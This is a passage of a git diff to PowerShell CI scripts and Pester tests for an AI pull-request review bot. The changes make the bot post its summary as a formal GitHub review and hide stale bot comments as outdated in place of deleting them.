$scriptPath +} + +Describe 'MauiBot artifact marker detection' { + It 'detects AI Summary artifacts by marker' { + Test-IsAISummaryCommentBody -Body "`n## AI Summary" | + Should -BeTrue + } + + It 'detects try-fix artifacts by current and legacy text markers' { + Test-IsTryFixCommentBody -Body "`nBody" | + Should -BeTrue + + Test-IsTryFixCommentBody -Body 'Automated review — alternative fix proposed' | + Should -BeTrue + } +} + +Describe 'Test-ShouldPreserveMauiBotArtifact' { + It 'preserves artifacts by node id or REST id' { + $artifact = [pscustomobject]@{ + id = 123 + node_id = 'PRR_test' + } + + Test-ShouldPreserveMauiBotArtifact -Artifact $artifact -PreserveNodeIds @('PRR_test') | + Should -BeTrue + + Test-ShouldPreserveMauiBotArtifact -Artifact $artifact -PreserveIds @('123') | + Should -BeTrue + } + + It 'does not preserve unmatched artifacts' { + $artifact = [pscustomobject]@{ + id = 123 + node_id = 'PRR_test' + } + + Test-ShouldPreserveMauiBotArtifact -Artifact $artifact -PreserveNodeIds @('other') -PreserveIds @('456') | + Should -BeFalse + } +} diff --git a/.github/scripts/Review-PR.Tests.ps1 b/.github/scripts/Review-PR.Tests.ps1 index f3674a0af24a..3d94ccc038ca 100644 --- a/.github/scripts/Review-PR.Tests.ps1 +++ b/.github/scripts/Review-PR.Tests.ps1 @@ -9,7 +9,7 @@ when TRX is missing) These functions sit on the critical path of STEP 3 (UI Test Execution - Results in the AI summary comment). A regression here can silently + Results in the AI summary review). A regression here can silently misrender per-test counts (e.g. "1/1 (1 ❌)" instead of "75/619 (544 ❌)") so they're worth pinning with focused tests. 
diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index c966ce7d9218..f1da6706ae02 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -398,7 +398,7 @@ if ($Phase -and $Phase -ne 'Setup') { # ─── Helper: Parse `dotnet test --logger "console;verbosity=detailed"` ────── # Extracts per-test results (Passed/Failed/Skipped) plus failure messages and # stack traces from raw stdout. Used by the RunDeepUITests stage and Gate so the -# AI summary comment shows WHICH tests failed and WHY, not just an aggregate exit code. +# AI summary review shows WHICH tests failed and WHY, not just an aggregate exit code. function Get-DotNetTestResults { param([string[]]$Lines) @@ -1010,7 +1010,7 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O # inline-stages architecture. Both phases are expensive (build the whole # repo, run agents on multiple candidates) and we just need STEPs 1-3 + # STEP 6 (post comment) to validate that detectedCategories / -# aiSummaryCommentId output variables flow through to the new +# aiSummaryReviewId output variables flow through to the new # RunDeepUITests + UpdateAISummaryComment stages. Flip $skipGateAndTryFix # back to $false (or delete the wrapper) once the new pipeline stages # are validated end-to-end. @@ -1639,9 +1639,9 @@ if (-not $DryRun) { } # ═════════════════════════════════════════════════════════════════════════════ -# STEP 6: Post AI Summary Comment (direct script invocation) +# STEP 6: Post AI Summary Review (direct script invocation) # When DEFER_COMMENT_TO_STAGE3=true, skip posting here — Stage 3 -# (UpdateAISummaryComment) will post the full comment after deep tests. +# (UpdateAISummaryComment) will post the full review after deep tests. 
# ═════════════════════════════════════════════════════════════════════════════ Write-Host "" @@ -1655,11 +1655,12 @@ if ($env:DEFER_COMMENT_TO_STAGE3 -eq 'true') { Write-Host " ⏭️ Deferred to Stage 3 (DEFER_COMMENT_TO_STAGE3=true)" -ForegroundColor Gray Write-Host " ℹ️ Content files saved in CopilotLogs artifact" -ForegroundColor Gray # Still emit a dummy output var so Stage 3 condition works - Write-Host "##vso[task.setvariable variable=aiSummaryCommentId;isOutput=true]DEFERRED" + Write-Host "##vso[task.setvariable variable=aiSummaryReviewId;isOutput=true]DEFERRED" } else { # Post PR review phases (pre-flight, try-fix, report) -$aiSummaryCommentId = $null +$aiSummaryReviewId = $null +$aiSummaryReviewNodeId = $null $reviewScript = Join-Path $summaryScriptsDir "post-ai-summary-comment.ps1" if (Test-Path $reviewScript) { try { @@ -1669,20 +1670,28 @@ if (Test-Path $reviewScript) { } else { $reviewOutput = & $reviewScript -PRNumber $PRNumber } - # Capture comment ID from script output (format: COMMENT_ID=) - $idLine = $reviewOutput | Where-Object { $_ -match '^COMMENT_ID=' } | Select-Object -Last 1 - if ($idLine -match '^COMMENT_ID=(\d+)$') { - $aiSummaryCommentId = $Matches[1] - Write-Host " ✅ PR review summary posted (comment ID: $aiSummaryCommentId)" -ForegroundColor Green + # Capture review ID from script output (format: AI_SUMMARY_REVIEW_ID=) + $idLine = $reviewOutput | Where-Object { $_ -match '^AI_SUMMARY_REVIEW_ID=' } | Select-Object -Last 1 + $nodeLine = $reviewOutput | Where-Object { $_ -match '^AI_SUMMARY_REVIEW_NODE_ID=' } | Select-Object -Last 1 + if ($idLine -match '^AI_SUMMARY_REVIEW_ID=(\d+)$') { + $aiSummaryReviewId = $Matches[1] + if ($nodeLine -match '^AI_SUMMARY_REVIEW_NODE_ID=(.+)$') { + $aiSummaryReviewNodeId = $Matches[1] + } + Write-Host " ✅ PR review summary posted (review ID: $aiSummaryReviewId)" -ForegroundColor Green - # Persist comment ID + PR number to a known location and emit + # Persist review ID + PR number to a known location and 
emit # as an output variable so the downstream UpdateAISummaryComment - # stage in ci-copilot.yml can rewrite the UI tests section once + # stage in ci-copilot.yml can rewrite the review body once # the deep UI tests finish on the platform-pool agents. - $commentIdFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/ai-summary-comment-id.txt" - New-Item -ItemType Directory -Force -Path (Split-Path -Parent $commentIdFile) | Out-Null - $aiSummaryCommentId | Set-Content $commentIdFile -Encoding UTF8 - Write-Host "##vso[task.setvariable variable=aiSummaryCommentId;isOutput=true]$aiSummaryCommentId" + $reviewIdFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/ai-summary-review-id.txt" + New-Item -ItemType Directory -Force -Path (Split-Path -Parent $reviewIdFile) | Out-Null + $aiSummaryReviewId | Set-Content $reviewIdFile -Encoding UTF8 + if (-not [string]::IsNullOrWhiteSpace($aiSummaryReviewNodeId)) { + $aiSummaryReviewNodeId | Set-Content (Join-Path (Split-Path -Parent $reviewIdFile) "ai-summary-review-node-id.txt") -Encoding UTF8 + Write-Host "##vso[task.setvariable variable=aiSummaryReviewNodeId;isOutput=true]$aiSummaryReviewNodeId" + } + Write-Host "##vso[task.setvariable variable=aiSummaryReviewId;isOutput=true]$aiSummaryReviewId" } else { Write-Host " ✅ PR review summary posted" -ForegroundColor Green } @@ -1693,7 +1702,7 @@ if (Test-Path $reviewScript) { Write-Host " ⚠️ post-ai-summary-comment.ps1 not found — skipping review summary" -ForegroundColor Yellow } -} # END DEFER_COMMENT_TO_STAGE3 else block (summary comment only — inline findings + labels always run below) +} # END DEFER_COMMENT_TO_STAGE3 else block (summary review only — inline findings + labels always run below) # Determine winning candidate (winner.json) — drives whether we post inline findings or request changes $winnerFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/winner.json" @@ -1730,8 +1739,8 @@ if (Test-Path $winnerFile) { 
$isPRWinner = (-not $winner) -or ($winner.isPRFix -eq $true) -if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { - Remove-StaleMauiBotIssueComments ` +if (Get-Command Hide-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { + Hide-StaleMauiBotIssueComments ` -PRNumber $PRNumber ` -IncludeTryFix ` -Reason "stale try-fix notice" @@ -1830,6 +1839,15 @@ $( if ($truncated) { "`n_The diff was truncated to fit GitHub's review body limi $resp = & gh api -X POST "repos/dotnet/maui/pulls/$PRNumber/reviews" --input $tmp 2>&1 Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue if ($LASTEXITCODE -eq 0) { + $tryFixReview = (($resp -join [Environment]::NewLine) | ConvertFrom-Json) + $tryFixDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent" + New-Item -ItemType Directory -Force -Path $tryFixDir | Out-Null + if ($tryFixReview.id) { + [string]$tryFixReview.id | Set-Content (Join-Path $tryFixDir "try-fix-review-id.txt") -Encoding UTF8 + } + if ($tryFixReview.node_id) { + [string]$tryFixReview.node_id | Set-Content (Join-Path $tryFixDir "try-fix-review-node-id.txt") -Encoding UTF8 + } Write-Host " ✅ REQUEST_CHANGES review submitted" -ForegroundColor Green } else { Write-Host " ⚠️ Failed to submit REQUEST_CHANGES review (non-fatal): $resp" -ForegroundColor Yellow diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 9f9f691de062..2add8afa6c8e 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -1,13 +1,13 @@ #!/usr/bin/env pwsh <# .SYNOPSIS - Posts the AI review summary comment on a GitHub Pull Request. + Posts the AI review summary as a GitHub Pull Request review. .DESCRIPTION - Maintains ONE comment per PR, identified by marker. - Before posting a fresh comment, any older generated AI Summary comments are - removed. 
The replacement comment contains only the latest review session, - keyed by the current HEAD commit SHA. + Creates a new PR review per run, identified by marker. + Before posting a fresh review, older generated AI Summary artifacts are + hidden as outdated. The replacement review contains only the latest review + session, keyed by the current HEAD commit SHA. After posting, the PR author is @-mentioned so they know to review. @@ -16,18 +16,18 @@ CustomAgentLogsTmp/PRState//PRAgent/{pre-flight,try-fix,report}/content.md CustomAgentLogsTmp/PRState//PRAgent/pre-flight/code-review.md - Gate is included as a section inside this unified comment — the script may + Gate is included as a section inside this unified review body — the script may be called by Review-PR.ps1 twice per run: once after the gate completes (gate-only update) and once after the review phases finish (full update). Any standalone legacy "" comment from older versions of - the script is deleted before the fresh comment is posted to avoid duplicates. + the script is hidden before the fresh review is posted to avoid duplicates. 
.PARAMETER PRNumber The pull request number (required) .PARAMETER DryRun - Print comment instead of posting + Print review body instead of posting .EXAMPLE ./post-ai-summary-comment.ps1 -PRNumber 12345 @@ -107,6 +107,82 @@ function Test-PhaseContentIsNoOp { } } +function Get-AIReviewEvent { + param([string]$ReportContent) + + if ([string]::IsNullOrWhiteSpace($ReportContent)) { + return 'COMMENT' + } + + $normalized = $ReportContent -replace "`r`n", "`n" + if ($normalized -match '(?im)^\s*(?:##\s*)?(?:✅\s*)?Final\s+Recommendation:\s*APPROVE\s*$') { + return 'APPROVE' + } + + if ($normalized -match '(?im)^\s*(?:##\s*)?(?:⚠️\s*)?Final\s+Recommendation:\s*REQUEST\s+CHANGES\s*$') { + return 'REQUEST_CHANGES' + } + + return 'COMMENT' +} + +function Get-PreservedMauiBotNodeIds { + param([Parameter(Mandatory = $true)][string]$PRAgentDir) + + $files = @( + 'try-fix-review-node-id.txt', + 'ai-summary-review-node-id.txt', + 'current-review-node-ids.txt' + ) + + $nodeIds = @() + foreach ($file in $files) { + $path = Join-Path $PRAgentDir $file + if (-not (Test-Path $path)) { + continue + } + + $nodeIds += Get-Content $path -Encoding UTF8 | ForEach-Object { + $value = [string]$_ + if (-not [string]::IsNullOrWhiteSpace($value)) { + $value.Trim() + } + } + } + + return @($nodeIds | Where-Object { -not [string]::IsNullOrWhiteSpace($_) } | Select-Object -Unique) +} + +function Invoke-PostPullRequestReview { + param( + [Parameter(Mandatory = $true)] + [int]$PRNumber, + + [Parameter(Mandatory = $true)] + [string]$Body, + + [Parameter(Mandatory = $true)] + [ValidateSet('APPROVE', 'REQUEST_CHANGES', 'COMMENT')] + [string]$Event + ) + + $tempFile = [System.IO.Path]::GetTempFileName() + try { + @{ body = $Body; event = $Event } | + ConvertTo-Json -Depth 10 | + Set-Content -Path $tempFile -Encoding UTF8 + + $response = gh api --method POST "repos/dotnet/maui/pulls/$PRNumber/reviews" --input $tempFile 2>&1 + if ($LASTEXITCODE -ne 0) { + throw "POST review failed (exit code $LASTEXITCODE): 
$response" + } + + return (($response -join [Environment]::NewLine) | ConvertFrom-Json) + } finally { + Remove-Item $tempFile -ErrorAction SilentlyContinue + } +} + # ─── Gate content (rendered first, always open) ─── $gateSection = $null $gateFilePath = Join-Path $PRAgentDir "gate/content.md" @@ -131,6 +207,7 @@ $gateContent } $phaseSections = @() +$phaseContentByKey = @{} foreach ($key in $phases.Keys) { $phase = $phases[$key] @@ -144,6 +221,7 @@ foreach ($key in $phases.Keys) { continue } + $phaseContentByKey[$key] = $content Write-Host " ✅ $key ($((Get-Item $filePath).Length) bytes)" -ForegroundColor Green # For uitests, make title dynamic: "UI Tests — Cat1, Cat2" $phaseTitle = "$($phase.Icon) $($phase.Title)" @@ -174,6 +252,9 @@ if (-not $gateSection -and $phaseSections.Count -eq 0) { throw "No gate or phase content found. Ensure at least one of gate/content.md or {phase}/content.md exists in $PRAgentDir." } +$reviewEvent = Get-AIReviewEvent -ReportContent $phaseContentByKey['report'] +Write-Host " 🧾 PR review event: $reviewEvent" -ForegroundColor Cyan + # ============================================================================ # FETCH PR METADATA (commit + author) # ============================================================================ @@ -227,11 +308,12 @@ $sessionMarkerEnd "@ # ============================================================================ -# FIND EXISTING COMMENT & BUILD FINAL BODY +# FIND EXISTING AI SUMMARY ARTIFACTS & BUILD FINAL BODY # ============================================================================ -Write-Host "Checking for existing review comment..." -ForegroundColor Yellow +Write-Host "Checking for existing AI Summary artifacts..." 
-ForegroundColor Yellow $existingCommentIds = @() +$existingReviewIds = @() $existingBodies = @() $existingRaw = gh api "repos/dotnet/maui/issues/$PRNumber/comments" --paginate 2>$null @@ -242,7 +324,16 @@ if ($existingRaw) { if ($existingObjs.Count -gt 0) { $existingCommentIds = @($existingObjs | ForEach-Object { $_.id }) $existingBodies = @($existingObjs | ForEach-Object { [string]$_.body }) - Write-Host "✓ Found existing AI Summary comment(s): $($existingCommentIds -join ', ')" -ForegroundColor Green + Write-Host "✓ Found existing AI Summary issue comment(s): $($existingCommentIds -join ', ')" -ForegroundColor Green + } + + if (Get-Command Get-GitHubPullRequestReviews -ErrorAction SilentlyContinue) { + $existingReviewObjs = @(Get-GitHubPullRequestReviews -PRNumber $PRNumber | Where-Object { $_.body -and $_.body.Contains($MARKER) }) + if ($existingReviewObjs.Count -gt 0) { + $existingReviewIds = @($existingReviewObjs | ForEach-Object { $_.id }) + $existingBodies += @($existingReviewObjs | ForEach-Object { [string]$_.body }) + Write-Host "✓ Found existing AI Summary review(s): $($existingReviewIds -join ', ')" -ForegroundColor Green + } } } catch { Write-Host "⚠️ Could not parse comments: $_" -ForegroundColor Yellow @@ -278,7 +369,7 @@ $newSessionBlock$finalizeSection # Clean up excessive blank lines $commentBody = $commentBody -replace "`n{4,}", "`n`n`n" -Write-Host " ✅ Built comment ($($commentBody.Length) chars)" -ForegroundColor Green +Write-Host " ✅ Built review body ($($commentBody.Length) chars)" -ForegroundColor Green # ============================================================================ # DRY RUN @@ -286,6 +377,7 @@ Write-Host " ✅ Built comment ($($commentBody.Length) chars)" -ForegroundColor if ($DryRun) { Write-Host "" + Write-Host "Review event: $reviewEvent" -ForegroundColor Cyan Write-Host "=== COMMENT PREVIEW ===" -ForegroundColor Cyan Write-Host $commentBody Write-Host "=== END PREVIEW ===" -ForegroundColor Cyan @@ -293,35 +385,57 @@ if 
($DryRun) { } # ============================================================================ -# DELETE STALE GENERATED COMMENTS, THEN POST COMMENT +# HIDE STALE GENERATED ARTIFACTS, THEN POST REVIEW # ============================================================================ -$tempFile = [System.IO.Path]::GetTempFileName() +$preserveNodeIds = Get-PreservedMauiBotNodeIds -PRAgentDir $PRAgentDir + +if (Get-Command Hide-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { + Hide-StaleMauiBotIssueComments ` + -PRNumber $PRNumber ` + -IncludeAISummary ` + -IncludeLegacyGate ` + -IncludeMergeConflict ` + -IncludeTryFix ` + -PreserveNodeIds $preserveNodeIds ` + -Reason "stale generated PR review artifact" +} + +if (Get-Command Hide-StaleMauiBotPullRequestReviews -ErrorAction SilentlyContinue) { + Hide-StaleMauiBotPullRequestReviews ` + -PRNumber $PRNumber ` + -IncludeAISummary ` + -IncludeTryFix ` + -PreserveNodeIds $preserveNodeIds ` + -Reason "stale generated PR review" ` + -DismissFormalReviews +} + +Write-Host "Creating new AI Summary PR review ($reviewEvent)..." 
-ForegroundColor Yellow +$postedEvent = $reviewEvent try { - @{ body = $commentBody } | ConvertTo-Json -Depth 10 | Set-Content -Path $tempFile -Encoding UTF8 - - if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { - Remove-StaleMauiBotIssueComments ` - -PRNumber $PRNumber ` - -IncludeAISummary ` - -IncludeLegacyGate ` - -IncludeMergeConflict ` - -IncludeTryFix ` - -Reason "stale generated PR review comment" + $review = Invoke-PostPullRequestReview -PRNumber $PRNumber -Body $commentBody -Event $postedEvent +} catch { + if ($postedEvent -eq 'COMMENT') { + throw } - if (Get-Command Dismiss-StaleMauiBotTryFixReviews -ErrorAction SilentlyContinue) { - Dismiss-StaleMauiBotTryFixReviews -PRNumber $PRNumber - } + Write-Host "⚠️ Formal $postedEvent review was rejected; retrying as COMMENT: $_" -ForegroundColor Yellow + $postedEvent = 'COMMENT' + $review = Invoke-PostPullRequestReview -PRNumber $PRNumber -Body $commentBody -Event $postedEvent +} - Write-Host "Creating new review comment..." 
-ForegroundColor Yellow - $newJson = gh api --method POST "repos/dotnet/maui/issues/$PRNumber/comments" --input $tempFile - if ($LASTEXITCODE -ne 0) { - throw "Failed to post AI Summary comment" - } - $newId = ($newJson | ConvertFrom-Json).id - Write-Host "✅ Review comment posted (ID: $newId)" -ForegroundColor Green - Write-Output "COMMENT_ID=$newId" -} finally { - Remove-Item $tempFile -ErrorAction SilentlyContinue +$reviewId = [string]$review.id +$reviewNodeId = [string]$review.node_id + +if (-not [string]::IsNullOrWhiteSpace($reviewId)) { + Set-Content -Path (Join-Path $PRAgentDir "ai-summary-review-id.txt") -Value $reviewId -Encoding UTF8 +} +if (-not [string]::IsNullOrWhiteSpace($reviewNodeId)) { + Set-Content -Path (Join-Path $PRAgentDir "ai-summary-review-node-id.txt") -Value $reviewNodeId -Encoding UTF8 } + +Write-Host "✅ AI Summary PR review posted (ID: $reviewId, event: $postedEvent)" -ForegroundColor Green +Write-Output "AI_SUMMARY_REVIEW_ID=$reviewId" +Write-Output "AI_SUMMARY_REVIEW_NODE_ID=$reviewNodeId" +Write-Output "AI_SUMMARY_REVIEW_EVENT=$postedEvent" diff --git a/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 b/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 index 850801483647..c816ac000501 100644 --- a/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 +++ b/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 @@ -46,6 +46,85 @@ function Test-IsTryFixCommentBody { ($Body.Contains('try-fix-') -and $Body.Contains('Candidate diff')) } +function Test-IsAISummaryCommentBody { + param([string]$Body) + + if ([string]::IsNullOrWhiteSpace($Body)) { + return $false + } + + return $Body.Contains($script:AiSummaryCommentMarker) +} + +function Test-ShouldPreserveMauiBotArtifact { + param( + [object]$Artifact, + [string[]]$PreserveNodeIds = @(), + [string[]]$PreserveIds = @() + ) + + $nodeId = [string]$Artifact.node_id + $id = [string]$Artifact.id + + return ( + (-not [string]::IsNullOrWhiteSpace($nodeId) -and $PreserveNodeIds -contains 
$nodeId) -or + (-not [string]::IsNullOrWhiteSpace($id) -and $PreserveIds -contains $id) + ) +} + +function Invoke-GitHubMinimizeComment { + [CmdletBinding()] + param( + [Parameter(Mandatory = $true)] + [string]$SubjectNodeId, + + [ValidateSet('SPAM', 'ABUSE', 'OFF_TOPIC', 'OUTDATED', 'DUPLICATE', 'RESOLVED', 'LOW_QUALITY')] + [string]$Classifier = 'OUTDATED', + + [string]$Reason = 'stale MauiBot artifact', + + [switch]$DryRun + ) + + if ([string]::IsNullOrWhiteSpace($SubjectNodeId)) { + Write-Host " Warning: cannot hide $Reason because node_id is empty" -ForegroundColor Yellow + return $false + } + + if ($DryRun) { + Write-Host " [DryRun] Would hide $Reason (node_id: $SubjectNodeId, classifier: $Classifier)" -ForegroundColor Magenta + return $true + } + + $query = @' +mutation MinimizeComment($subjectId: ID!, $classifier: ReportedContentClassifiers!) { + minimizeComment(input: { subjectId: $subjectId, classifier: $classifier }) { + minimizedComment { + isMinimized + minimizedReason + } + } +} +'@ + + try { + Write-Host " Hiding $Reason (node_id: $SubjectNodeId, classifier: $Classifier)..." 
-ForegroundColor Gray + $output = gh api graphql ` + -f query="$query" ` + -F subjectId="$SubjectNodeId" ` + -F classifier="$Classifier" 2>&1 + + if ($LASTEXITCODE -ne 0) { + throw "minimizeComment failed (exit code $LASTEXITCODE): $output" + } + + return $true + } catch { + Write-Host " Warning: could not hide $Reason with node_id ${SubjectNodeId}: $_" -ForegroundColor Yellow + return $false + } +} + function Get-GitHubIssueComments { param([Parameter(Mandatory = $true)][int]$PRNumber) @@ -62,7 +141,7 @@ function Get-GitHubIssueComments { } } -function Remove-StaleMauiBotIssueComments { +function Hide-StaleMauiBotIssueComments { [CmdletBinding()] param( [Parameter(Mandatory = $true)] @@ -73,6 +152,12 @@ function Remove-StaleMauiBotIssueComments { [switch]$IncludeMergeConflict, [switch]$IncludeTryFix, + [string[]]$PreserveNodeIds = @(), + [string[]]$PreserveIds = @(), + + [ValidateSet('SPAM', 'ABUSE', 'OFF_TOPIC', 'OUTDATED', 'DUPLICATE', 'RESOLVED', 'LOW_QUALITY')] + [string]$Classifier = 'OUTDATED', + [string]$Reason = 'stale MauiBot comment', [switch]$DryRun ) @@ -84,13 +169,17 @@ function Remove-StaleMauiBotIssueComments { $staleComments = @() foreach ($comment in $comments) { + if (Test-ShouldPreserveMauiBotArtifact -Artifact $comment -PreserveNodeIds $PreserveNodeIds -PreserveIds $PreserveIds) { + continue + } + $body = [string]$comment.body if ([string]::IsNullOrWhiteSpace($body)) { continue } $matchesGeneratedMarker = - ($IncludeAISummary -and $body.Contains($script:AiSummaryCommentMarker)) -or + ($IncludeAISummary -and (Test-IsAISummaryCommentBody $body)) -or ($IncludeLegacyGate -and $body.Contains($script:AiGateCommentMarker)) $matchesBotOnlyContent = @@ -105,23 +194,48 @@ function Remove-StaleMauiBotIssueComments { } foreach ($comment in $staleComments) { - if ($DryRun) { - Write-Host " [DryRun] Would delete $Reason (comment ID: $($comment.id))" -ForegroundColor Magenta - continue - } - - try { - Write-Host " Deleting $Reason (comment ID: 
$($comment.id))..." -ForegroundColor Gray - $deleteOutput = gh api --method DELETE "repos/dotnet/maui/issues/comments/$($comment.id)" 2>&1 - if ($LASTEXITCODE -ne 0) { - throw "DELETE failed (exit code $LASTEXITCODE): $deleteOutput" - } - } catch { - Write-Host " Warning: could not delete $Reason comment $($comment.id): $_" -ForegroundColor Yellow - } + Invoke-GitHubMinimizeComment ` + -SubjectNodeId ([string]$comment.node_id) ` + -Classifier $Classifier ` + -Reason "$Reason comment $($comment.id)" ` + -DryRun:$DryRun | Out-Null } } +function Remove-StaleMauiBotIssueComments { + [CmdletBinding()] + param( + [Parameter(Mandatory = $true)] + [int]$PRNumber, + + [switch]$IncludeAISummary, + [switch]$IncludeLegacyGate, + [switch]$IncludeMergeConflict, + [switch]$IncludeTryFix, + + [string[]]$PreserveNodeIds = @(), + [string[]]$PreserveIds = @(), + + [ValidateSet('SPAM', 'ABUSE', 'OFF_TOPIC', 'OUTDATED', 'DUPLICATE', 'RESOLVED', 'LOW_QUALITY')] + [string]$Classifier = 'OUTDATED', + + [string]$Reason = 'stale MauiBot comment', + [switch]$DryRun + ) + + Hide-StaleMauiBotIssueComments ` + -PRNumber $PRNumber ` + -IncludeAISummary:$IncludeAISummary ` + -IncludeLegacyGate:$IncludeLegacyGate ` + -IncludeMergeConflict:$IncludeMergeConflict ` + -IncludeTryFix:$IncludeTryFix ` + -PreserveNodeIds $PreserveNodeIds ` + -PreserveIds $PreserveIds ` + -Classifier $Classifier ` + -Reason $Reason ` + -DryRun:$DryRun +} + function Get-GitHubPullRequestReviews { param([Parameter(Mandatory = $true)][int]$PRNumber) @@ -138,13 +252,63 @@ function Get-GitHubPullRequestReviews { } } -function Dismiss-StaleMauiBotTryFixReviews { +function Dismiss-MauiBotPullRequestReview { [CmdletBinding()] param( [Parameter(Mandatory = $true)] [int]$PRNumber, - [string]$Reason = 'superseded MauiBot try-fix review', + [Parameter(Mandatory = $true)] + [object]$Review, + + [string]$Reason = 'Superseded by a newer MauiBot review run.', + [switch]$DryRun + ) + + if ($DryRun) { + Write-Host " [DryRun] Would dismiss 
stale review ID $($Review.id)" -ForegroundColor Magenta + return $true + } + + $tmp = New-TemporaryFile + try { + @{ message = $Reason } | + ConvertTo-Json -Compress | + Set-Content -LiteralPath $tmp -Encoding UTF8 -NoNewline + + Write-Host " Dismissing stale review ID $($Review.id)..." -ForegroundColor Gray + $dismissOutput = gh api --method PUT "repos/dotnet/maui/pulls/$PRNumber/reviews/$($Review.id)/dismissals" --input $tmp.FullName 2>&1 + if ($LASTEXITCODE -ne 0) { + throw "dismissal failed (exit code $LASTEXITCODE): $dismissOutput" + } + + return $true + } catch { + Write-Host " Warning: could not dismiss review $($Review.id): $_" -ForegroundColor Yellow + return $false + } finally { + Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue + } +} + +function Hide-StaleMauiBotPullRequestReviews { + [CmdletBinding()] + param( + [Parameter(Mandatory = $true)] + [int]$PRNumber, + + [switch]$IncludeAISummary, + [switch]$IncludeTryFix, + + [string[]]$PreserveNodeIds = @(), + [string[]]$PreserveIds = @(), + + [ValidateSet('SPAM', 'ABUSE', 'OFF_TOPIC', 'OUTDATED', 'DUPLICATE', 'RESOLVED', 'LOW_QUALITY')] + [string]$Classifier = 'OUTDATED', + + [string]$Reason = 'stale MauiBot review', + [switch]$DismissChangesRequested, + [switch]$DismissFormalReviews, [switch]$DryRun ) @@ -153,33 +317,68 @@ function Dismiss-StaleMauiBotTryFixReviews { return } - $staleReviews = @($reviews | Where-Object { - (Test-IsMauiBotCommentAuthor $_) -and - ([string]$_.state -ieq 'CHANGES_REQUESTED') -and - (Test-IsTryFixCommentBody ([string]$_.body)) - }) + $staleReviews = @() + foreach ($review in $reviews) { + if (Test-ShouldPreserveMauiBotArtifact -Artifact $review -PreserveNodeIds $PreserveNodeIds -PreserveIds $PreserveIds) { + continue + } - foreach ($review in $staleReviews) { - if ($DryRun) { - Write-Host " [DryRun] Would dismiss $Reason (review ID: $($review.id))" -ForegroundColor Magenta + $body = [string]$review.body + if ([string]::IsNullOrWhiteSpace($body) -or -not 
(Test-IsMauiBotCommentAuthor $review)) { continue } - $tmp = New-TemporaryFile - try { - @{ message = 'Superseded by a newer MauiBot review run.' } | - ConvertTo-Json -Compress | - Set-Content -LiteralPath $tmp -Encoding UTF8 -NoNewline - - Write-Host " Dismissing $Reason (review ID: $($review.id))..." -ForegroundColor Gray - $dismissOutput = gh api --method PUT "repos/dotnet/maui/pulls/$PRNumber/reviews/$($review.id)/dismissals" --input $tmp.FullName 2>&1 - if ($LASTEXITCODE -ne 0) { - throw "dismissal failed (exit code $LASTEXITCODE): $dismissOutput" - } - } catch { - Write-Host " Warning: could not dismiss $Reason review $($review.id): $_" -ForegroundColor Yellow - } finally { - Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue + $matchesReview = + ($IncludeAISummary -and (Test-IsAISummaryCommentBody $body)) -or + ($IncludeTryFix -and (Test-IsTryFixCommentBody $body)) + + if ($matchesReview) { + $staleReviews += $review } } + + foreach ($review in $staleReviews) { + Invoke-GitHubMinimizeComment ` + -SubjectNodeId ([string]$review.node_id) ` + -Classifier $Classifier ` + -Reason "$Reason review $($review.id)" ` + -DryRun:$DryRun | Out-Null + + $reviewState = [string]$review.state + $shouldDismiss = + ($DismissFormalReviews -and $reviewState -in @('APPROVED', 'CHANGES_REQUESTED')) -or + ($DismissChangesRequested -and $reviewState -ieq 'CHANGES_REQUESTED') + + if ($shouldDismiss) { + Dismiss-MauiBotPullRequestReview ` + -PRNumber $PRNumber ` + -Review $review ` + -Reason 'Superseded by a newer MauiBot review run.' 
` + -DryRun:$DryRun | Out-Null + } + } +} + +function Dismiss-StaleMauiBotTryFixReviews { + [CmdletBinding()] + param( + [Parameter(Mandatory = $true)] + [int]$PRNumber, + + [string[]]$PreserveNodeIds = @(), + [string[]]$PreserveIds = @(), + + [string]$Reason = 'superseded MauiBot try-fix review', + [switch]$DryRun + ) + + Hide-StaleMauiBotPullRequestReviews ` + -PRNumber $PRNumber ` + -IncludeTryFix ` + -PreserveNodeIds $PreserveNodeIds ` + -PreserveIds $PreserveIds ` + -Classifier OUTDATED ` + -Reason $Reason ` + -DismissChangesRequested ` + -DryRun:$DryRun } diff --git a/.github/skills/code-review/SKILL.md b/.github/skills/code-review/SKILL.md index 1a8d1bb0b37b..dc252d78a705 100644 --- a/.github/skills/code-review/SKILL.md +++ b/.github/skills/code-review/SKILL.md @@ -200,13 +200,13 @@ pwsh .github/scripts/post-inline-review.ps1 -PRNumber -DryRun pwsh .github/scripts/post-inline-review.ps1 -PRNumber ``` -**Wall-of-text summary** (phase content assembled into a single PR comment): +**Wall-of-text summary** (phase content assembled into a PR review body): ```bash # Called by Review-PR.ps1 automatically: pwsh .github/scripts/post-ai-summary-comment.ps1 ``` -In CI (`eng/pipelines/ci-copilot.yml`), `Review-PR.ps1` calls both `post-inline-review.ps1` (for inline findings) and `post-ai-summary-comment.ps1` (for the wall-of-text from `{phase}/content.md` files), using `GH_COMMENT_TOKEN`. +In CI (`eng/pipelines/ci-copilot.yml`), `Review-PR.ps1` calls both `post-inline-review.ps1` (for inline findings) and `post-ai-summary-comment.ps1` (for the wall-of-text from `{phase}/content.md` files), using `GH_COMMENT_TOKEN`. The trusted posting script may submit 